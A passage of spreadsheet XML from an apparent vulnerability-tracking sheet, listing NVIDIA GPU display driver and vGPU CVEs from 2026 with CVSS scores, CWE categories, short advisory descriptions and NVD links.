      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S161"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1" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47519</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47520</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S162"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2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47520</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47521</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S163"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3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47521</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47523</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S164"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64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47523</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47528</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>CWE-824</t>
        </is>
      </c>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the firmware where an attacker could cause an access of an uninitialized pointer. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47528</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47530</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S166"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66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47530</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47535</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Linux contains a vulnerability in the firmware where an attacker could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47535</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47536</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S168"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8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47536</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47540</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause an integer underflow. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47540</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47541</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="inlineStr"/>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr"/>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Linux contains a vulnerability in the kernel mode layer where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47541</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47545</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr"/>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47545</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47548</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S172"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72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47548</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47550</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer where an unprivileged local user can supply an untrusted pointer that the driver dereferences without validation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47550</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47551</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="inlineStr"/>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where a user could cause a use-after-free. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47551</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47552</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="inlineStr"/>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user could bypass an authorization check and modify privileged configuration. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47552</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47553</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="inlineStr"/>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47553</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47556</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S177" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause an integer overflow that leads to an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47556</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47558</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S178" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause a double-free of imported memory state. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47558</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
